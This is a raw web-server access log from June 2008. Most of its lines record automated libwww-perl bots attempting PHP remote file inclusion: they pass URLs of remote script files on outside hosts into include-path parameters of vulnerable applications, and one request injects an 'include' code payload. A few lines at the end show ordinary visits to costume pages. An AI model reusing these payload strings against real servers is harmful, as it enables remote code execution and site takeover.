201.245.12.66 - - [27/Jun/2008:19:02:19 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 314 "-""libwww-perl/5.76"
201.245.12.66 - - [27/Jun/2008:19:02:20 -0500] "GET //skin/zero_vote/error.php?dir=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 309 "-""libwww-perl/5.76"
85.214.33.25 - - [27/Jun/2008:19:08:50 -0500] "GET /logs//login.php?dir=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
85.214.33.25 - - [27/Jun/2008:19:08:51 -0500] "GET //login.php?dir=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
219.93.96.46 - - [27/Jun/2008:19:10:32 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 348 "-""libwww-perl/5.79"
219.93.96.46 - - [27/Jun/2008:19:10:33 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 343 "-""libwww-perl/5.79"
62.2.100.138 - - [27/Jun/2008:19:11:36 -0500] "GET /logs/access_log.1207785600//modules/My_eGallery/index.php?basepath=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 341 "-""libwww-perl/5.803"
62.2.100.138 - - [27/Jun/2008:19:11:36 -0500] "GET //modules/My_eGallery/index.php?basepath=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.803"
62.2.100.138 - - [27/Jun/2008:19:11:37 -0500] "GET /logs//modules/My_eGallery/index.php?basepath=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 319 "-""libwww-perl/5.803"
85.214.33.25 - - [27/Jun/2008:19:11:38 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 352 "-""libwww-perl/5.803"
85.214.33.25 - - [27/Jun/2008:19:11:38 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 347 "-""libwww-perl/5.803"
202.86.8.102 - - [27/Jun/2008:19:12:19 -0500] "GET /logs//login.php?dir=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
202.86.8.102 - - [27/Jun/2008:19:12:20 -0500] "GET //login.php?dir=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
219.154.22.244 - - [27/Jun/2008:19:12:40 -0500] "GET /logs//login.php?dir=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
219.154.22.244 - - [27/Jun/2008:19:12:40 -0500] "GET //login.php?dir=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 294 "-""libwww-perl/5.65"
207.58.164.77 - - [27/Jun/2008:19:13:23 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 325 "-""libwww-perl/5.810"
207.58.164.77 - - [27/Jun/2008:19:13:23 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 320 "-""libwww-perl/5.810"
200.219.226.74 - - [27/Jun/2008:19:13:43 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://tutoriaisclube.com/imagens/safeon??????? HTTP/1.1" 404 338 "-""libwww-perl/5.79"
200.219.226.74 - - [27/Jun/2008:19:13:43 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://tutoriaisclube.com/imagens/safeon??????? HTTP/1.1" 404 333 "-""libwww-perl/5.79"
61.63.1.134 - - [27/Jun/2008:19:13:47 -0500] "GET /logs//?mosConfig_absolute_path=http://www.sandmanwv.com/echo.txt? HTTP/1.1" 200 89222 "-""libwww-perl/5.65"
61.63.1.134 - - [27/Jun/2008:19:13:48 -0500] "GET //?mosConfig_absolute_path=http://www.sandmanwv.com/echo.txt? HTTP/1.1" 200 1243 "-""libwww-perl/5.65"
201.245.12.66 - - [27/Jun/2008:19:17:20 -0500] "GET /logs//login.php?dir=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 299 "-""libwww-perl/5.76"
201.245.12.66 - - [27/Jun/2008:19:17:20 -0500] "GET //login.php?dir=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 294 "-""libwww-perl/5.76"
85.17.3.183 - - [27/Jun/2008:19:17:44 -0500] "GET //admin/oneadmin/newspublish/include.php?path[docroot]=http://kingsofwarcraft.com/info? HTTP/1.1" 404 323 "-""libwww-perl/5.79"
85.25.94.30 - - [27/Jun/2008:19:18:15 -0500] "GET /logs/errors.php?error=http://members.lycos.co.uk/dudi42/id.txt???? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
85.25.94.30 - - [27/Jun/2008:19:18:15 -0500] "GET /errors.php?error=http://members.lycos.co.uk/dudi42/id.txt???? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
59.188.4.56 - - [27/Jun/2008:19:18:47 -0500] "GET /logs//login.php?dir=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
59.188.4.56 - - [27/Jun/2008:19:18:48 -0500] "GET //login.php?dir=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
66.139.75.98 - - [27/Jun/2008:19:19:58 -0500] "GET /logs//errors.php?error=http://silenceisdefeat.org/~fantasize/text/tx.txt?t??t??t??? HTTP/1.1" 404 300 "-""libwww-perl/5.65"
66.139.75.98 - - [27/Jun/2008:19:19:58 -0500] "GET //errors.php?error=http://silenceisdefeat.org/~fantasize/text/tx.txt?t??t??t??? HTTP/1.1" 404 295 "-""libwww-perl/5.65"
210.240.12.14 - - [27/Jun/2008:19:20:07 -0500] "GET /logs//login.php?dir=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
210.240.12.14 - - [27/Jun/2008:19:20:08 -0500] "GET //login.php?dir=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
216.75.30.119 - - [27/Jun/2008:19:21:12 -0500] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://silenceisdefeat.org/~fantasize/text/tx.txt?t??t??t??? HTTP/1.1" 404 357 "-""libwww-perl/5.803"
216.75.30.119 - - [27/Jun/2008:19:21:12 -0500] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://silenceisdefeat.org/~fantasize/text/tx.txt?t??t??t??? HTTP/1.1" 404 352 "-""libwww-perl/5.803"
71.6.211.72 - - [27/Jun/2008:19:21:13 -0500] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://silenceisdefeat.org/~fantasize/text/tx.txt?t??t??t??? HTTP/1.1" 404 357 "-""libwww-perl/5.810"
71.6.211.72 - - [27/Jun/2008:19:21:13 -0500] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://silenceisdefeat.org/~fantasize/text/tx.txt?t??t??t??? HTTP/1.1" 404 352 "-""libwww-perl/5.810"
85.25.94.30 - - [27/Jun/2008:19:21:31 -0500] "GET /logs/errors.php?error=http://members.lycos.co.uk/dudi42/id.txt???? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
85.25.94.30 - - [27/Jun/2008:19:21:35 -0500] "GET /errors.php?error=http://members.lycos.co.uk/dudi42/id.txt???? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
66.139.75.98 - - [27/Jun/2008:19:21:52 -0500] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://silenceisdefeat.org/~fantasize/text/tx.txt?t??t??t??? HTTP/1.1" 404 357 "-""libwww-perl/5.65"
66.139.75.98 - - [27/Jun/2008:19:21:52 -0500] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://silenceisdefeat.org/~fantasize/text/tx.txt?t??t??t??? HTTP/1.1" 404 352 "-""libwww-perl/5.65"
193.34.16.180 - - [27/Jun/2008:19:22:50 -0500] "GET /logs//errors.php?error=http://silenceisdefeat.org/~fantasize/text/tx.txt?t??t??t??? HTTP/1.1" 404 300 "-""libwww-perl/5.810"
193.34.16.180 - - [27/Jun/2008:19:22:50 -0500] "GET //errors.php?error=http://silenceisdefeat.org/~fantasize/text/tx.txt?t??t??t??? HTTP/1.1" 404 295 "-""libwww-perl/5.810"
59.188.4.56 - - [27/Jun/2008:19:22:58 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 352 "-""libwww-perl/5.79"
59.188.4.56 - - [27/Jun/2008:19:22:59 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 347 "-""libwww-perl/5.79"
210.240.12.14 - - [27/Jun/2008:19:25:13 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 352 "-""libwww-perl/5.803"
210.240.12.14 - - [27/Jun/2008:19:25:14 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 347 "-""libwww-perl/5.803"
85.214.33.25 - - [27/Jun/2008:19:25:39 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 352 "-""libwww-perl/5.803"
85.214.33.25 - - [27/Jun/2008:19:25:39 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 347 "-""libwww-perl/5.803"
210.240.12.14 - - [27/Jun/2008:19:32:11 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 352 "-""libwww-perl/5.803"
210.240.12.14 - - [27/Jun/2008:19:32:12 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 347 "-""libwww-perl/5.803"
193.34.16.180 - - [27/Jun/2008:19:32:15 -0500] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://silenceisdefeat.org/~fantasize/text/tx.txt?t??t??t??? HTTP/1.1" 404 357 "-""libwww-perl/5.810"
193.34.16.180 - - [27/Jun/2008:19:32:15 -0500] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://silenceisdefeat.org/~fantasize/text/tx.txt?t??t??t??? HTTP/1.1" 404 352 "-""libwww-perl/5.810"
201.245.12.66 - - [27/Jun/2008:19:33:54 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 352 "-""libwww-perl/5.76"
201.245.12.66 - - [27/Jun/2008:19:33:55 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 347 "-""libwww-perl/5.76"
216.75.30.119 - - [27/Jun/2008:19:34:19 -0500] "GET /logs//errors.php?error=http://silenceisdefeat.org/~fantasize/text/tx.txt?t??t??t??? HTTP/1.1" 404 300 "-""libwww-perl/5.803"
216.75.30.119 - - [27/Jun/2008:19:34:19 -0500] "GET //errors.php?error=http://silenceisdefeat.org/~fantasize/text/tx.txt?t??t??t??? HTTP/1.1" 404 295 "-""libwww-perl/5.803"
71.6.211.72 - - [27/Jun/2008:19:34:23 -0500] "GET /logs//errors.php?error=http://silenceisdefeat.org/~fantasize/text/tx.txt?t??t??t??? HTTP/1.1" 404 300 "-""libwww-perl/5.810"
71.6.211.72 - - [27/Jun/2008:19:34:23 -0500] "GET //errors.php?error=http://silenceisdefeat.org/~fantasize/text/tx.txt?t??t??t??? HTTP/1.1" 404 295 "-""libwww-perl/5.810"
202.53.78.212 - - [27/Jun/2008:19:34:34 -0500] "GET /logs//login.php?dir=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
202.53.78.212 - - [27/Jun/2008:19:34:34 -0500] "GET //login.php?dir=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
72.55.153.11 - - [27/Jun/2008:19:35:26 -0500] "GET /?include_path=http://www.goodimmo.com/romid.txt???? HTTP/1.1" 200 1243 "-""libwww-perl/5.811"
85.214.33.25 - - [27/Jun/2008:19:35:38 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 348 "-""libwww-perl/5.803"
85.214.33.25 - - [27/Jun/2008:19:35:39 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 343 "-""libwww-perl/5.803"
8.2.208.2 - - [27/Jun/2008:19:38:10 -0500] "GET /?include_path=http://www.goodimmo.com/romid.txt???? HTTP/1.1" 200 1243 "-""libwww-perl/5.76"
207.58.164.77 - - [27/Jun/2008:19:38:42 -0500] "GET /logs/index.php?pagina1=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 298 "-""libwww-perl/5.810"
207.58.164.77 - - [27/Jun/2008:19:38:42 -0500] "GET /index.php?pagina1=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 293 "-""libwww-perl/5.810"
202.53.78.212 - - [27/Jun/2008:19:39:21 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 352 "-""libwww-perl/5.79"
202.53.78.212 - - [27/Jun/2008:19:39:23 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 347 "-""libwww-perl/5.79"
83.172.140.56 - - [27/Jun/2008:19:40:04 -0500] "GET /logs/access_log.1183507200//tools/send_reminders.php?noSet=0&includedir=http://www.crapsells.us/home/uplimg/image_america.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.65"
83.172.140.56 - - [27/Jun/2008:19:40:05 -0500] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.crapsells.us/home/uplimg/image_america.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.65"
83.172.140.56 - - [27/Jun/2008:19:40:05 -0500] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.crapsells.us/home/uplimg/image_america.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.65"
207.58.164.77 - - [27/Jun/2008:19:40:58 -0500] "GET /logs/access_log.1182384000/index.php?site1=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 320 "-""libwww-perl/5.810"
207.58.164.77 - - [27/Jun/2008:19:40:58 -0500] "GET /index.php?site1=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 293 "-""libwww-perl/5.810"
207.58.164.77 - - [27/Jun/2008:19:40:58 -0500] "GET /logs/index.php?site1=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 298 "-""libwww-perl/5.810"
207.58.164.77 - - [27/Jun/2008:19:41:33 -0500] "GET /logs/access_log.1186531200/index.php?site1=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 320 "-""libwww-perl/5.810"
207.58.164.77 - - [27/Jun/2008:19:41:38 -0500] "GET /logs/access_log.1207785600/index.php?site1=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 320 "-""libwww-perl/5.810"
89.108.66.182 - - [27/Jun/2008:19:42:46 -0500] "GET /logs//errors.php?error=http://silenceisdefeat.org/~fantasize/text/tx.txt?t??t??t??? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
89.108.66.182 - - [27/Jun/2008:19:42:46 -0500] "GET //errors.php?error=http://silenceisdefeat.org/~fantasize/text/tx.txt?t??t??t??? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
85.214.33.25 - - [27/Jun/2008:19:43:34 -0500] "GET /logs/errors.php?error=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
85.214.33.25 - - [27/Jun/2008:19:43:35 -0500] "GET /errors.php?error=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
64.22.89.194 - - [27/Jun/2008:19:44:36 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 352 "-""libwww-perl/5.812"
64.22.89.194 - - [27/Jun/2008:19:44:36 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.812"
85.214.33.25 - - [27/Jun/2008:19:45:29 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 343 "-""libwww-perl/5.803"
85.214.33.25 - - [27/Jun/2008:19:45:29 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 338 "-""libwww-perl/5.803"
59.188.4.56 - - [27/Jun/2008:19:45:32 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 352 "-""libwww-perl/5.79"
59.188.4.56 - - [27/Jun/2008:19:45:33 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 347 "-""libwww-perl/5.79"
74.53.197.2 - - [27/Jun/2008:19:46:43 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 352 "-""libwww-perl/5.79"
74.53.197.2 - - [27/Jun/2008:19:46:43 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.79"
202.43.35.133 - - [27/Jun/2008:19:47:07 -0500] "GET /logs/include/write.php?dir=http://bryanae1.smooth-host.co.uk/id.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.811"
202.43.35.133 - - [27/Jun/2008:19:47:08 -0500] "GET /include/write.php?dir=http://bryanae1.smooth-host.co.uk/id.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.811"
8.2.208.2 - - [27/Jun/2008:19:48:21 -0500] "GET /logs/access_log.1207785600/?include_path=http://www.goodimmo.com/romid.txt???? HTTP/1.1" 404 311 "-""libwww-perl/5.76"
8.2.208.2 - - [27/Jun/2008:19:48:22 -0500] "GET /?include_path=http://www.goodimmo.com/romid.txt???? HTTP/1.1" 200 1243 "-""libwww-perl/5.76"
8.2.208.2 - - [27/Jun/2008:19:48:23 -0500] "GET /logs/?include_path=http://www.goodimmo.com/romid.txt???? HTTP/1.1" 200 89217 "-""libwww-perl/5.76"
202.53.78.212 - - [27/Jun/2008:19:48:54 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 352 "-""libwww-perl/5.79"
202.53.78.212 - - [27/Jun/2008:19:48:55 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 347 "-""libwww-perl/5.79"
72.55.153.11 - - [27/Jun/2008:19:50:07 -0500] "GET /logs/access_log.1207785600/?include_path=http://www.goodimmo.com/romid.txt???? HTTP/1.1" 404 311 "-""libwww-perl/5.811"
72.55.153.11 - - [27/Jun/2008:19:50:07 -0500] "GET /?include_path=http://www.goodimmo.com/romid.txt???? HTTP/1.1" 200 1243 "-""libwww-perl/5.811"
72.55.153.11 - - [27/Jun/2008:19:50:08 -0500] "GET /logs/?include_path=http://www.goodimmo.com/romid.txt???? HTTP/1.1" 200 89217 "-""libwww-perl/5.811"
202.43.35.133 - - [27/Jun/2008:19:50:27 -0500] "GET /logs/mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://bryanae1.smooth-host.co.uk/id.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.811"
202.43.35.133 - - [27/Jun/2008:19:50:28 -0500] "GET /mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://bryanae1.smooth-host.co.uk/id.txt?? HTTP/1.1" 404 311 "-""libwww-perl/5.811"
64.22.89.194 - - [27/Jun/2008:19:50:53 -0500] "GET /logs//agendax/addevent.inc.php?agendax_path=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.812"
64.22.89.194 - - [27/Jun/2008:19:50:53 -0500] "GET //agendax/addevent.inc.php?agendax_path=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.812"
141.212.113.110 - - [27/Jun/2008:19:50:55 -0500] "GET /logs/access_log.1183507200//tools/send_reminders.php?noSet=0&includedir=http://http://www.crapsells.us/home/uplimg/image_america.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
141.212.113.110 - - [27/Jun/2008:19:50:55 -0500] "GET //tools/send_reminders.php?noSet=0&includedir=http://http://www.crapsells.us/home/uplimg/image_america.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
141.212.113.110 - - [27/Jun/2008:19:50:55 -0500] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://http://www.crapsells.us/home/uplimg/image_america.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
64.22.89.194 - - [27/Jun/2008:19:52:03 -0500] "GET /logs//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 350 "-""libwww-perl/5.812"
64.22.89.194 - - [27/Jun/2008:19:52:03 -0500] "GET //administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 345 "-""libwww-perl/5.812"
74.53.197.2 - - [27/Jun/2008:19:52:13 -0500] "GET /logs//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 350 "-""libwww-perl/5.79"
74.53.197.2 - - [27/Jun/2008:19:52:13 -0500] "GET //administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 345 "-""libwww-perl/5.79"
201.245.12.66 - - [27/Jun/2008:19:52:32 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 352 "-""libwww-perl/5.76"
201.245.12.66 - - [27/Jun/2008:19:52:34 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 347 "-""libwww-perl/5.76"
59.188.4.56 - - [27/Jun/2008:19:54:17 -0500] "GET /logs/errors.php?error=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
59.188.4.56 - - [27/Jun/2008:19:54:18 -0500] "GET /errors.php?error=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
85.25.94.30 - - [27/Jun/2008:19:54:47 -0500] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://members.lycos.co.uk/dudi42/id.txt???? HTTP/1.1" 404 302 "-""libwww-perl/5.803"
85.25.94.30 - - [27/Jun/2008:19:54:47 -0500] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://members.lycos.co.uk/dudi42/id.txt???? HTTP/1.1" 404 307 "-""libwww-perl/5.803"
85.25.94.30 - - [27/Jun/2008:19:55:29 -0500] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://members.lycos.co.uk/dudi42/id.txt???? HTTP/1.1" 404 307 "-""libwww-perl/5.803"
85.25.94.30 - - [27/Jun/2008:19:55:29 -0500] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://members.lycos.co.uk/dudi42/id.txt???? HTTP/1.1" 404 302 "-""libwww-perl/5.803"
209.62.115.202 - - [27/Jun/2008:19:58:19 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://www.donorweb.org/redfox/myrox.txt?? HTTP/1.1" 404 311 "-""libwww-perl/5.811"
209.62.115.202 - - [27/Jun/2008:19:58:19 -0500] "GET //config/dbutil.bck.php?confdir=http://www.donorweb.org/redfox/myrox.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.811"
60.62.197.197 - - [27/Jun/2008:20:00:09 -0500] "GET /costume/index1.htm HTTP/1.1" 304 - "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
60.62.197.197 - - [27/Jun/2008:20:00:22 -0500] "GET /costume/costume2.htm HTTP/1.1" 304 - "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
60.62.197.197 - - [27/Jun/2008:20:00:25 -0500] "GET /costume/costume1.htm HTTP/1.1" 304 - "http://tomdolan.pconline.com/costume/""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
60.62.197.197 - - [27/Jun/2008:20:00:26 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 304 - "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
60.62.197.197 - - [27/Jun/2008:20:00:26 -0500] "GET /costume/history5.gif HTTP/1.1" 304 - "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
60.62.197.197 - - [27/Jun/2008:20:00:26 -0500] "GET /costume/enter1.gif HTTP/1.1" 304 - "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
60.62.197.197 - - [27/Jun/2008:20:00:29 -0500] "GET /costume/links.htm HTTP/1.1" 200 1029 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
210.240.12.14 - - [27/Jun/2008:20:00:40 -0500] "GET /logs/errors.php?error=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
210.240.12.14 - - [27/Jun/2008:20:00:41 -0500] "GET /errors.php?error=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
210.240.12.14 - - [27/Jun/2008:20:00:56 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 343 "-""libwww-perl/5.803"
210.240.12.14 - - [27/Jun/2008:20:00:56 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 338 "-""libwww-perl/5.803"
